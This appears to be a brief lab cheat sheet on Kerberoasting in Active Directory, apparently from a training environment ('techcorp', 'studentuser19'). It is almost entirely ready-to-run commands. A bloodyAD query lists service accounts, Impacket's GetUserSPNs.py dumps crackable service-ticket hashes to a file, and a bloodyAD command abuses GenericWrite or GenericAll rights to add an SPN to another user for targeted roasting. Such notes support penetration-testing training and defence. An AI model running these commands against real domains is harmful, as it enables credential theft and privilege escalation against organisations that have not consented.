
Kerberoasting

List kerberoastable users

```bash
bloodyAD -u studentuser19 -d us.techcorp.local -p password --host 192.168.1.2 get search --filter '(servicePrincipalName=*)' --attr distinguishedName --base CN=Users,DC=us,DC=techcorp,DC=local
```

Kerberoast all accounts

```bash
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip KeyDistributionCenter 'DOMAIN/USER:Password'
```

Targeted Kerberoasting

If an attacker controls an account that has the rights to add an SPN to another account (GenericAll, GenericWrite), those rights can be abused to make that other account vulnerable to Kerberoasting.

```bash
bloodyAD -u studentuser19 -d us.techcorp.local -p password --host 192.168.1.2 set object "Support19User" servicePrincipalName -v "US/support19userSPN"
```

WARNING

The new SPN should be unique in the domain.